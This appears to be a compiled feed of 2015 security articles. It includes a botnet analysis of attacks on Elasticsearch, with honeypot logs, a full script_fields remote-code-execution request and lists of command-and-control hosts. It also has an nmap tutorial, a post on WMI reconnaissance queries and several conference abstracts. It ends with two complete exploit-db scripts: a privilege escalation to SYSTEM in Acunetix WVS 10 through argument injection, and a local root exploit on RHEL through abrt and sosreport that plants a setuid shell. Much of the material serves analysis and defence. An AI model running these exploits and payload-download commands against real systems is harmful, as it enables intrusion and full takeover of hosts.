yf2: VT - 21 / 56

-rwxr-x--- 1 bware bware 1315556 Nov 22 11:13 68089
-rwxr-x--- 1 bware bware 1312420 Nov 23 08:43 508
-rwxr-x--- 1 bware bware 1312292 Aug 13 02:36 ssss
-rwxr-x--- 1 bware bware 1223123 Nov 22 11:35 04
-rwxr-x--- 1 bware bware 1223123 Sep 15 08:02 syn25000
-rwxr-x--- 1 bware bware 1223123 Sep 17 13:09 udp
-rwxr-x--- 1 bware bware 1223123 Dez 2 2014 vpcinull
-rwxr-x--- 1 bware bware 1128800 Nov 20 13:58 xdg1
-rwxr-x--- 1 bware bware 1128800 Okt 6 13:33 xdwl
-rwxr-x--- 1 bware bware 1128800 Dez 13 2013 xoxo
-rwxr-x--- 1 bware bware 841596 Nov 24 08:10 libvent
-rwxr-x--- 1 bware bware 727556 Okt 7 08:24 yf2
-rwxr-x--- 1 bware bware 87600 Nov 23 17:56 TcT

What we observed among all the bots is that their DNS names for C&C servers, ports and fallbacks were obfuscated and are not available in plaintext when extracting the strings from the executables. Interestingly, Akamai released an analysis on XORDDoS botnets performing DDoS attacks, and it could be the case that the bots we collected are hiding such interesting information, but we did not analyze the code of the bots further, so we cannot say for sure.

Stage 1: Scan & Exploit!

Coming from stage 0 (scans that are merely just GET / requests) there is a simple way for an attacker to land an exploit: just three requests and you are owned. The following shows one attack, stripped down to the commands executed (you'll find a full exploit in the Appendix below):

-- download the bots
00:46:39 [alert] request: wget -O /tmp/yf1 http://114.215.149.148/yf1
00:46:40 [alert] request: wget -O /tmp/yf2 http://114.215.149.148/yf2
-- hours later ... executing the bot
05:03:21 [alert] request: chmod 777 /tmp/*
05:03:22 [alert] request: chmod 777 /tmp/yf2 &
05:03:22 [alert] request: chmod 777 /tmp/yf1 &
05:03:23 [alert] request: /tmp/yf2 &
05:03:23 [alert] request: nohup /tmp/yf2 > /dev/null 2>&1
05:03:24 [alert] request: /tmp/yf1 &
05:03:24 [alert] request: nohup /tmp/yf1 > /dev/null 2>&1
-- making changes persistent to start the bot upon next
-- reboot and shutdown the firewall
05:03:25 [alert] request: echo \"cd /tmp/\">>/etc/rc.local
05:03:25 [alert] request: echo \"/tmp/yf2\">>/etc/rc.local
05:03:26 [alert] request: echo \"/etc/init.d/iptables stop\">>/etc/rc.local
05:03:26 [alert] request: echo \"/tmp/yf1\">>/etc/rc.local
05:03:27 [alert] request: echo \"/etc/init.d/iptables stop\">>/etc/rc.local

At this point if you had a vulnerable ElasticSearch instance running you'd be considered hacked, and if you ran it as Root the infection would be persistent and survive a reboot.

Stage 2: Calling Home

After execution, the bots request the IP of their current C&C master. Most bots we've seen are using a DNS name to get the IP, while we also observed some bots using included IPs, especially when no DNS servers could be reached.

Bot communication - getting the IP of the current C&C

After getting the current IP, some traffic from the bot could be observed, including an identifier and some information about the system the bot runs on, reporting "On duty, Sire!"

-- some identifiers, sent by bots to their masters
-==Healer==- Linux 3.16.0-0.bpo.4-amd64 2.40
-==ruirui ==- Linux 3.16.0-0.bpo.4-amd64 2.40
Linux 3.16.0-0.bpo.4-amd64 root 4*2494MHZ 3688MB 0M 172.17.0.104

Bot-Communication, reporting into the botnet

After reporting itself "ready" the bot pings the master every 5 seconds, waiting for commands and targets to attack, while transmitting its own status every 30 seconds.

Bot-Communication, keep-alive pings and status reports

One variant (ssss) of those fBots occasionally requested and downloaded a file (amp.dat) from the server it initially got the bot from (http://111.74.239.61:8080/ntp.txt); the latest version of this file consisted of 14000+ IPs; it might be a list of servers that might be misused for amplification/reflection attacks. We're not yet done checking all the IPs, but will deliver this analysis later in a future blog post.

Stage 3: Attack!

When the C&C master promotes a new target, it's sent over to the client with a single packet and the show begins:

Bot-Communication, getting target IP and attack start

What we've seen among all fBots: once the bot receives a target IP it immediately fires traffic (SYN flood) onto a given port, either HTTP, MYSQL or other random ports. The bots fire at max speed, so any traffic originating from an infected server should easily be detected if the DC operator enforces thresholds or monitors outgoing traffic. You definitely will see spikes.

Some notes on infection workflow and botnet infrastructure

A closer look at the operation of the whole botnet infrastructure revealed an interesting workflow that functions as follows:

Scanners crawl the internet, searching for vulnerable Elasticsearch installations; once they find one they start to execute an exploit
The exploit downloads a bot from a different server that hosts various bots and files
After download, the scanning server executes the bot on vulnerable installations
If the bot runs, it requests the IP for the C&C master or uses a hardcoded IP and reports itself as ready, waiting for commands
Upon receiving the attack command and the IP of a target, the attacks start

Thus we see a distributed infrastructure, controlled by the botmasters to create and operate botnets. In a follow-up blog we'll take a closer look at the botnet infrastructure itself, and analyze it more deeply.

The OTX pulses we created are:
ElasticSearch-Botnet C&C-Master DNS-Names
ElasticSearch-Botnet C&C-Master IPs
ElasticSearch Botnet - Botware Download URLs

Footnotes

it will be exploited, the question is not IF, but WHEN; scanners are scanning, 24/7

References

Shodan: It's the Data, Stupid!
A few things about Redis security
Elasticsearch CVE-2015-5377
What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability
MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution
MMD-0025-2014 - ITW Infection of ELF .IptabLex & .IptabLes China #DDoS bots malware
A close look at an operating botnet
MMD-0035-2015 - .IptabLex or .IptabLes on shellshock.. sponsored by ChinaZ actor
Akamai: Threat Advisory: XOR DDoS

Appendix

Full exploit code, as seen by our honeypots:

request: "GET /_search?source={"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/yf2 http://111.222.333.444/yf2\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1} HTTP/1.1", host: "my.boy.lollipop:9200"

Domains queried to get C&C IPs:
-- fBots
www.zhimingge.in
yy.zhimingge.in
www.3xdk.com
fk.appledoesnt.com
www.3xdk.com
-- iBots
00120012.3322.org

List of servers that host various versions of bots (bot-providers):
http://111.74.239.61:8080/ssss
http://111.74.239.61:8080/ntp.txt - ntp-servers
http://198.15.216.27:2015/xdg1
http://111.74.239.61:8080/68089
http://111.74.239.61:8080/04
http://61.160.221.139:8000/xoxo
http://222.186.30.247:8080/udp
http://222.186.34.177:5656/vpcinull
http://222.186.31.248:53/libvent
http://114.215.149.148/yf2

Current C&C IPs from the bots we executed and analyzed:
23.234.50.12
61.160.194.62
61.160.221.139
103.105.144.172
108.171.252.20
113.105.144.172
183.60.202.75
222.186.15.92
222.186.30.247
222.186.34.177
222.186.21.106
222.186.190.233
222.186.56.15

About the Author

Bio: Markus Manzke is a Security Analyst with a German partner of AlienVault's, 8ack. Please follow 8ack on Twitter.

Source: https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities
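The command sequence the honeypot recorded (payload fetch into /tmp, chmod 777, background execution, rc.local persistence, iptables stop) is a good basis for a detection rule over Elasticsearch access or reverse-proxy logs. The following is an added example, not code from the post or the 8ack honeypots; it parses log lines in the `HH:MM:SS [level] request: ...` shape shown above (constructed samples, with a documentation address standing in for the real download host) and tags each with the stage it belongs to, including the `script_fields` RCE vector from the appendix.

```python
import re
from collections import Counter

LINE_RE = re.compile(r"^\d{2}:\d{2}:\d{2} \[(?P<level>\w+)\] request: (?P<cmd>.*)$")

# Stage patterns modelled on the honeypot capture quoted in the post.
STAGE_PATTERNS = {
    "download": re.compile(r"\b(wget|curl)\b.*\s/tmp/\S+"),
    "permission": re.compile(r"\bchmod\s+\S+\s+/tmp/"),
    "execute": re.compile(r"^(nohup\s+)?/tmp/\S+"),
    "persistence": re.compile(r">>\s*/etc/rc\.local\b"),
    "firewall_disable": re.compile(r"\biptables\s+stop\b"),
    "rce_script_fields": re.compile(r"script_fields.*Runtime\.getRuntime\(\)\.exec", re.S),
}


def classify(line):
    """Return the set of stage tags that apply to one log line (empty if unparseable)."""
    m = LINE_RE.match(line)
    if not m:
        return set()
    cmd = m.group("cmd")
    return {tag for tag, pat in STAGE_PATTERNS.items() if pat.search(cmd)}


def summarize(lines):
    """Count how many lines matched each stage."""
    counts = Counter()
    for line in lines:
        counts.update(classify(line))
    return counts


def is_compromise_chain(lines):
    """True when the log shows payload fetch, execution and persistence together."""
    seen = set()
    for line in lines:
        seen |= classify(line)
    return {"download", "execute", "persistence"} <= seen


# Constructed sample in the post's log format; 198.51.100.7 is a documentation address.
SAMPLE_LOG = """\
00:46:39 [alert] request: GET /_search?source={"script_fields": {"exp": {"script": "import java.io.*;Runtime.getRuntime().exec(\\"id\\");"}}} HTTP/1.1
00:46:40 [alert] request: wget -O /tmp/yf1 http://198.51.100.7/yf1
05:03:21 [alert] request: chmod 777 /tmp/*
05:03:23 [alert] request: /tmp/yf2 &
05:03:23 [alert] request: nohup /tmp/yf2 > /dev/null 2>&1
05:03:25 [alert] request: echo "cd /tmp/">>/etc/rc.local
05:03:26 [alert] request: echo "/etc/init.d/iptables stop">>/etc/rc.local
05:04:00 [info] request: GET / HTTP/1.1
""".splitlines()
```

Each tag on its own is noisy (an administrator may legitimately append to rc.local), which is why `is_compromise_chain` alerts on the combination rather than on a single line.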
17. Port Scanning 101

Author - Natalia Wadden

Matrix Reloaded, Bourne Ultimatum and a brief glimpse in Girl with the Dragon Tattoo – these are just a few movies which feature a port scanning technique called nmap. Before we go too far, let's define nmap. It sounds glamorous; it must be, it is featured in at least 3 major Hollywood films. Nmap aka Network Mapper is a security scanner that is used to detect hosts and services on a computer network – in short it can determine which ports are open, what the operating system (OS) and version is, which services are offered, and what firewalls are used – basically it can create a map of the computer network and hosts. Nmap is portable; it can be used across multiple platforms, Windows, Mac and Linux, but it is most commonly used in Linux. For this article, I will be using Kali Linux; it's easy and many tools are already built into the OS.

My mentor described ports as windows in a building, which means that nmap is looking for the open windows aka ports. So let's dive in and scan our test machine and see if we can find any open ports. Our simple nmap scan provided us with a significant amount of information; this can be overwhelming if you don't know what to look for – let's try to break it down. Nmap has shown us that each of these ports is open via the 3-way TCP handshake. A SYN was sent to an open port, in the case above port 80 (web), and it responded with a SYN ACK; the client answered the SYN ACK with an ACK, thereby completing the response. An open port 80 is not uncommon; many websites have this open as they require it as part of their business. For example, Amazon, Ebay and Google all have port 80 open; if they weren't open nobody could see their website.

Now let's try this again but use a UDP (User Datagram Protocol) scan along with nmap, and see what happens. A UDP scan does not require the 3-way handshake, which means a request will be sent out, but a response is not necessarily received; there is no guarantee of delivery. UDP is typically used for streaming audio media and real-time video as it is designed to handle occasional lost packets, so only slight degradation in quality occurs, rather than large delays if lost packets were retransmitted. The results of our UDP nmap scan above provide us with a datagram of possible vulnerabilities, ports which, if we were curious, we could continue investigating, such as Port 53, Port 69, Port 137 and Port 2049 – if we listen to these ports, we potentially might be pleasantly surprised with what we find.

Let's do one more; let's see if we can find out what versions are running on each port. Let's try another one; this time, type in nmap man; this will bring up the nmap manual. In our next example, let's try a built-in shorthand for the most popular options, "-A". This type of scan provides additional information about the remote system beyond the ports provided by a typical nmap scan. Take a close look at the results of our scan - with a simple command, we have now discovered the OS version, the various hosts as well as the version of Tomcat.

Nmap is used by many individuals, and not all of them are "bad"; some are malicious individuals looking to sniff around networks looking for open ports to get information; others are security professionals, using nmap to conduct penetration testing to safely exploit system vulnerabilities to evaluate the security.

Source: http://www.adeptus-mechanicus.com/codex/contrib/nw-ps101/nw-ps101.php
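Seen from the scanned side, nmap's SYN probes look like one source touching many distinct ports in a short time, which is exactly what a firewall or flow log lets a defender count. The following is an added example, not from the article; it parses constructed connection-log lines (documentation addresses, and a log field layout that is an assumption of this example) and flags any source that reaches a threshold of distinct target ports inside a sliding time window, keeping TCP and UDP probes apart since the article contrasts the two.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed log shape; the field names are an assumption for this example.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) proto=(?P<proto>tcp|udp) dport=(?P<dport>\d+)$"
)


def parse_line(line):
    """Return (timestamp, src, dst, proto, dport) or None for lines that do not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return (datetime.fromisoformat(m["ts"]), m["src"], m["dst"], m["proto"], int(m["dport"]))


def detect_scans(lines, threshold=10, window_seconds=60):
    """Return {src: peak number of distinct (dst, proto, port) targets seen inside
    any window} for sources that reached the threshold; quiet sources are omitted."""
    events = [e for e in map(parse_line, lines) if e is not None]
    events.sort(key=lambda e: e[0])
    recent = defaultdict(deque)  # per-source events still inside the window
    alerts = {}
    window = timedelta(seconds=window_seconds)
    for ts, src, dst, proto, port in events:
        q = recent[src]
        q.append((ts, (dst, proto, port)))
        while ts - q[0][0] > window:
            q.popleft()
        distinct = len({target for _, target in q})
        if distinct >= threshold:
            alerts[src] = max(alerts.get(src, 0), distinct)
    return alerts


def make_sample_log():
    """Constructed: one host sweeping 12 TCP ports in 12 seconds, one ordinary
    web client talking to ports 80 and 443, plus a malformed line to skip."""
    base = datetime(2015, 12, 8, 10, 0, 0)
    lines = []
    for i, port in enumerate(range(21, 33)):
        ts = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} src=203.0.113.5 dst=192.0.2.10 proto=tcp dport={port}")
    for i in range(20):
        ts = (base + timedelta(seconds=3 * i)).isoformat()
        lines.append(f"{ts} src=198.51.100.20 dst=192.0.2.10 proto=tcp dport={80 if i % 2 else 443}")
    lines.append("malformed line that the parser must skip")
    return lines
```

The web client makes many connections but only ever to two targets, so it never crosses the threshold; the sweeping host does, and the reported value is the largest number of distinct targets it touched within one window.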
  18. Thoughts on Exploiting a Remote WMI Query Vulnerability

On December 1, 2015, a really interesting vulnerability was disclosed in the Dell Foundation Services software. If installed, a SOAP service will listen on port 7779 and grant an attacker the ability to execute unauthenticated WMI queries. I can’t say I’ve ever encountered such a vulnerability class so this posed an interesting thought exercise into how an attacker might effectively exploit such a vulnerability beyond just using the queries to conduct host recon. Specifically, this vulnerability only allows an attacker to query WMI object instances within the default namespace – ROOT/CIMv2. This means that you cannot invoke WMI methods or perform event registration - i.e. this is not a remote code execution vulnerability.

I released a PoC PowerShell exploit that allows you to easily view and parse WMI query output from a vulnerable host. The script could be used to test the exploit locally assuming you have a Dell computer to test on. The vulnerable software can be obtained from Dell. Specifically, the vulnerable function is contained within Dell.Tribbles.Agent.Plugins.SystemInfo.dll.

So what kinds of things could an attacker do that would give them the greatest bang for their buck? For starters, let’s say you wanted to list all available classes within the ROOT/CIMv2 namespace as a means of determining the attack surface?

PS C:\> Get-DellFoundationServicesWmiObject -IPAddress 127.0.0.1 -Query 'SELECT * FROM Meta_Class'

What you will find is that there is a sea of WMI classes. We’ll need to find the diamonds in the rough. Here is an extremely non-comprehensive list of what I came up with in conjunction with Sean Metcalf and Carlos Perez:

File listing for a specific directory, e.g. C:\, or search by extension
    SELECT * FROM CIM_DataFile WHERE Drive="C:" AND Path="\\"
    SELECT * FROM CIM_DataFile WHERE Extension="xlsx"

Process listing (including command-line invocation which could possibly include credentials)
    SELECT * FROM Win32_Process

List all services
    SELECT * FROM Win32_Service

Account/group enumeration
    SELECT * FROM Win32_Account
    SELECT * FROM Win32_UserAccount
    SELECT * FROM Win32_Group
    SELECT * FROM Win32_LoggedOnUser

List startup programs present in the registry and Start Menu
    SELECT * FROM Win32_StartupCommand

OS/Hardware info
    SELECT * FROM Win32_BIOS
    SELECT * FROM Win32_ComputerSystem
    # Uptime, logged-in user, etc.
    SELECT * FROM Win32_OperatingSystem

Hard disk enumeration
    SELECT * FROM Win32_DiskDrive
    SELECT * FROM Win32_DiskPartition
    SELECT * FROM Win32_LogicalDisk
    SELECT * FROM Win32_Volume
    SELECT * FROM Win32_MountPoint

List system environment variables
    SELECT * FROM Win32_Environment

List network devices and configurations
    SELECT * FROM Win32_NetworkAdapter
    # Shows assigned IPs
    SELECT * FROM Win32_NetworkAdapterConfiguration

List mapped shares
    SELECT * FROM Win32_Share

Obviously, there are a ton of classes that I may be missing that you may find to be useful but these were the ones that stood out to me. Now, beyond performing simple recon actions, what other WMI queries might be impactful, enable leaks of extremely sensitive information, enable further exploitation, or cause system instability? Here are some queries I came up with:

Ping sweep. This could be used to conduct basic internal scanning.
    SELECT * FROM Win32_PingStatus WHERE Address="10.10.0.1"

Potentially screw with MSI configurations.
    SELECT * FROM Win32_Product

List installed patches, i.e. determine which patches are not installed.
    SELECT * FROM Win32_QuickFixEngineering

Dump event logs, e.g. dump the System log. This is the most sensitive info leak I can think of.
    SELECT * FROM Win32_NtLogEvent WHERE Logfile="System"

If you can think of any additional classes that would go above and beyond host recon, please let me know on Twitter!

Source: http://www.exploit-monday.com/2015/12/thoughts-on-exploiting-remote-wmi-query.html
  19. Malware Crypters – the Deceptive First Layer

DECEMBER 2, 2015 | BY HASHEREZADE

Recently, two suspects were arrested for selling Cryptex Reborn and other FUD tools (helping to install malware in a Fully UnDetectable way). Today, we will study some examples to make sure that everyone knows what this type of tool is and why it is dangerous. We will also present some examples of identifying and unpacking a malware crypter.

Crypters – what are they?

Most modern malware samples, in addition to built-in defensive techniques, are protected by some packer or crypter. A crypter’s role is basically to be the first – and most complex – layer of defense for the malicious core. They try to deceive pattern-based or even behavior-based detection engines – often slowing down the analysis process by masquerading as a harmless program, then unpacking/decrypting their malicious payload. They may also add some icons and metadata that make the sample look like a legitimate product.

Underground crypters, created to defend malware against antivirus/anti-malware products, are sold in typical cybercriminal hangouts. Below, you can see examples of crypters being advertised on the black market and the tricks they use:

Full article: https://blog.malwarebytes.org/development/2015/12/malware-crypters-the-deceptive-first-layer/
  20. DEF CON 23 - Vehicle Hacking Village - Eric Evenchick - SocketCAN

Exploration of what SocketCAN is, how it works and how it can be used to create CANBUS applications.
  21. DEF CON 23 - Vehicle Hacking Village - Nathan Hoch - The Badge and PAWN: Customizing the Badge Overview of how to modify the badge for the game at Vehicle Hacking Village.
  22. DEF CON 23 - Samy Kamkar - Drive it like you Hacked it: New Attacks and Tools to Wireles

Gary Numan said it best. Cars. They’re everywhere. You can hardly drive down a busy freeway without seeing one. But what about their security? In this talk I’ll reveal new research and real attacks in the area of wirelessly controlled gates, garages, and cars. Many cars are now controlled from mobile devices over GSM, while even more can be unlocked and ignitions started from wireless keyfobs over RF. All of these are subject to attack with low-cost tools (such as RTL-SDR, GNU Radio, HackRF, Arduino, and even a Mattel toy). We will investigate how these features work, and of course, how they can be exploited. I will be releasing new tools and vulnerabilities in this area, such as key-space reduction attacks on fixed-codes, advanced "code grabbers" using RF attacks on encrypted and rolling codes, and how to protect yourself against such issues. By the end of this talk you’ll understand not only how vehicles and the wirelessly-controlled physical access protecting them can be exploited, but also learn about various tools for car and RF research, as well as how to use and build your own inexpensive devices for such investigation. Ladies and gentlemen, start your engines. And other people’s engines.

Samy Kamkar is a security researcher, best known for creating The MySpace Worm, one of the fastest spreading viruses of all time. He (attempts to) illustrate terrifying vulnerabilities with playfulness, and his exploits have been branded:

“Controversial”, -The Wall Street Journal
“Horrific”, -The New York Times
“Now I want to fill my USB ports up with cement”, -Gizmodo

He’s demonstrated usurping typical hardware for surreptitious means such as with KeySweeper, turning a standard USB wall charger into a covert, wireless keyboard sniffer, and SkyJack, a custom drone which takes over any other nearby drones allowing them to be controlled as a massive zombie swarm.

He’s exposed issues around privacy, such as by developing the Evercookie which appeared in a top-secret NSA document revealed by Edward Snowden, exemplifying techniques used by governments and corporations for clandestine web tracking, and has discovered and released research around the illicit GPS and location tracking performed by Apple, Google and Microsoft mobile devices. He continues to produce new research and tools for the public as open source and open hardware.

Twitter: @samykamkar
  23. DEF CON 23 - Marc Rogers and Kevin Mahaffey - How to Hack a Tesla Model S

The Tesla Model S is the most connected car in the world. It might surprise you to hear that it is also one of the most secure. In this talk we will walk you through the architecture of a Tesla Model S noting things that Tesla got right as well as identifying those that they got wrong. From this talk you will get an intimate understanding of how the many interconnected systems in a Tesla Model S work and most importantly how they can be hacked. You will also get a good understanding of the data that this connected car collects and what Tesla does with this telemetry. We will also be releasing a tool that will enable Tesla Model S owners to view and analyse that telemetry in real time. Finally we will also be releasing several 0day vulnerabilities that will allow you to hack a Tesla Model S yourself - both locally and remotely.

Note - only one of the 6 vulnerabilities we will discuss and release has been fixed.

Disclaimer: With great access comes great responsibility - In other words we are not responsible for any Tesla Model S bricked by over enthusiastic attendees of this talk

Speaker Bios:

Marc Rogers aka Cyberjunky has been a prominent member of the hacking scene since the 80’s. Some of his most notable achievements are co-founding the notorious British hacker group, “The Agents of a Hostile Power” and his role in creating and appearing in the award winning BBC TV series “The Real Hustle”. Marc’s professional career spans more than twenty years, including a decade managing security for the UK operator Vodafone. Marc is currently the principal security researcher for web optimization and security company “CloudFlare”. As well as his work in the infosec and telecoms industries, Marc has also been a CISO in South Korea and co-founder of a disruptive Bay Area start-up. Some of Marc’s notable recent hacks include Google Glass, Apple TouchID and most recently the Tesla Model S.

Kevin is an entrepreneur and technologist with a background in mobile and web technology, security, and privacy. He is the CTO of Lookout, a company dedicated to making the world a safer place as it becomes more connected, starting with smartphones and tablets. He co-founded Lookout in 2007 and is responsible for driving Lookout’s technology to protect people from current and future threats while keeping the product simple and easy to use. He started building software when he was 8 years old and it has been a love affair ever since. Kevin is a frequent speaker on security, privacy, mobile, and other topics.
  24. Acunetix WVS 10 - Local Privilege escalation

'''
========================================================================
Acunetix WVS 10 - from guest to System (Local privilege escalation)
CVE: CVE-2015-4027
Author: (me) Daniele Linguaglossa
Affected Product: Acunetix WVS 10
Exploit: Local privilege escalation
Vendor: Acunetix ltd
Remote: No
Version: 10
=========================================================================

A local privilege escalation exists in Acunetix WVS 10; it allows a local user (even guest) to gain the same privilege as the System user. With the default Acunetix installation, a service called "AcuWVSSchedulerv10" will be installed; this service runs as the local system user. AcuWVSSchedulerv10 is responsible for scan scheduling without user interaction; it exposes some API to interact with via a web server, usually localhost:8183.

API:
/listScan
/addScan <== vulnerable one
/deleteScan
etc...

When a user schedules a scan, API "addScan" will be called as follows

-------------------------------------------------------------------------------
POST /api/addScan HTTP/1.1
Host: localhost:8183
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
RequestValidated: true
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8183/
Content-Length: 452
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{
  "scanType": "scan",
  "targetList": "",
  "target": ["http://.target.it"],
  "recurse": "-1",
  "date": "12/2/2015",
  "dayOfWeek": "1",
  "dayOfMonth": "1",
  "time": "12:21",
  "deleteAfterCompletion": "False",
  "params": {
    "profile": "Default",
    "loginSeq": "<none>",
    "settings": "Default",
    "scanningmode": "heuristic",
    "excludedhours": "<none>",
    "savetodatabase": "True",
    "savelogs": "False",
    "generatereport": "False",
    "reportformat": "PDF",
    "reporttemplate": "WVSAffectedItemsReport.rep",
    "emailaddress": ""
  }
}
------------------------------------------------------------------------------

The first thing I noticed was the reporttemplate; this was used to create the report when scanning ends, so it means an external file which we can control will then be used by System! This would be interesting enough but I never looked deep into it. Instead I noticed something even worse: the filename was used as an argument to wvs.exe, called with system privilege! By looking at how Acunetix handled the reporttemplate argument I figured out that it was possible to inject custom arguments within reporttemplate; now this is where Acunetix helps us, in fact wvs was provided with an interesting argument, it was /Run, as the reference says: https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/

Run a command line command during the crawl.
Syntax: /Run [command]
Example: /Run curl http://example.com/dir1/

Wow that's really nice, so in order to execute a command we must insert a fake Crawl followed by a Run command, so reporttemplate becomes:

"reporttemplate": "WVSAffectedItemsReport.rep /Craw http://fakesite.it /Run cmd.exe"

It worked, cmd ran as System!

==================================================================================
Now let's pwn this!

escalation.py
'''

import httplib
import json
from datetime import datetime
import sys
from time import gmtime, strftime

COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe"
ACUHOST = '127.0.0.1'
ACUPORT = 8183
ACUHEADERS = {
    "Content-Type": "application/json; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "RequestValidated": "true"
}
ACUEXPLOIT = "/Crawl http://www.google.it /Run \"" + COMMAND + "\""
ACUDATA = {"scanType": "scan",
           "targetList": "",
           "target": ["http://" + "A" * 2048],
           "recurse": "-1",
           "date": strftime("%m/%d/%Y", gmtime()),
           "dayOfWeek": "1",
           "dayOfMonth": "1",
           "time": "%s:%s" % (datetime.now().hour, datetime.now().minute + 1),
           "deleteAfterCompletion": "False",
           "params": {"profile": "Default",
                      "loginSeq": "<none>",
                      "settings": "Default",
                      "scanningmode": "heuristic",
                      "excludedhours": "<none>",
                      "savetodatabase": "True",
                      "savelogs": "False",
                      "generatereport": "False",
                      "reportformat": "PDF",
                      "reporttemplate": "WVSDeveloperReport.rep " + ACUEXPLOIT,
                      "emailaddress": ""}
           }


def sendExploit():
    conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
    conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
    resp = conn.getresponse()
    return "%s %s" % (resp.status, resp.reason)


print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n"
print "[+] Command : %s will be executed as SYSTEM" % COMMAND
print "[+] Sending exploit..."
print "[+] Result: " + sendExploit()
print "[+] Done!"

'''
============================================================================
I hope this write-up was funny enough; anyway I really would like to thank Acunetix product manager N.S. for the really fast answer and bug mitigation. Right now a patch exists, so hurry up and download it now.
============================================================================
'''

Source: https://www.exploit-db.com/exploits/38847/
  25. RHEL 7.0/7.1 - abrt/sosreport Local Root

#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport: sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release
# Red Hat Enterprise Linux Server release 7.1 (Maipo)

import os, sys, glob, time, sys, socket

payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"

pid = os.fork()

if pid == 0:
    os.execl("/usr/bin/sleep", "sleep", "100")

time.sleep(0.5)

print "crashing pid %d" % pid

os.kill(pid, 11)

print "waiting for dump directory"


def waitpath(p):
    while 1:
        r = glob.glob(p)
        if len(r) > 0:
            return r
        time.sleep(0.05)


dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]

print "dump directory: ", dumpdir

os.chdir(dumpdir)

print "waiting for sosreport directory"

sosreport = waitpath("sosreport-*")[0]

print "sosreport: ", sosreport

print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")
print "tmpfiles: ", tmpfiles

print "moving directory"

os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport, 0777)

os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs", 0777)

os.symlink("/proc/sys/kernel/modprobe", sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe", sosreport + "/sos_logs/ui.log")

print "moving tmpfiles"

for x in tmpfiles:
    print "%s -> %s" % (x, x + ".old")
    os.rename(x, x + ".old")
    open(x, "w+").write("/tmp/hax.sh\n")
    os.chmod(x, 0666)

os.chdir("/")

sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")


def trigger():
    open("/tmp/hax.sh", "w+").write(payload)
    os.chmod("/tmp/hax.sh", 0755)
    try:
        socket.socket(socket.AF_INET, socket.SOCK_STREAM, 132)
    except:
        pass
    time.sleep(0.5)

    try:
        os.stat("/tmp/sh")
    except:
        print "could not create suid"
        sys.exit(-1)

    print "success"
    os.execl("/tmp/sh", "sh", "-p", "-c", '''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
    sys.exit(-1)


for x in xrange(0, 60 * 10):
    if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
        print "done"
        trigger()
    time.sleep(1)
    sys.stderr.write(".")

print "timed out"

Source: https://www.exploit-db.com/exploits/38832/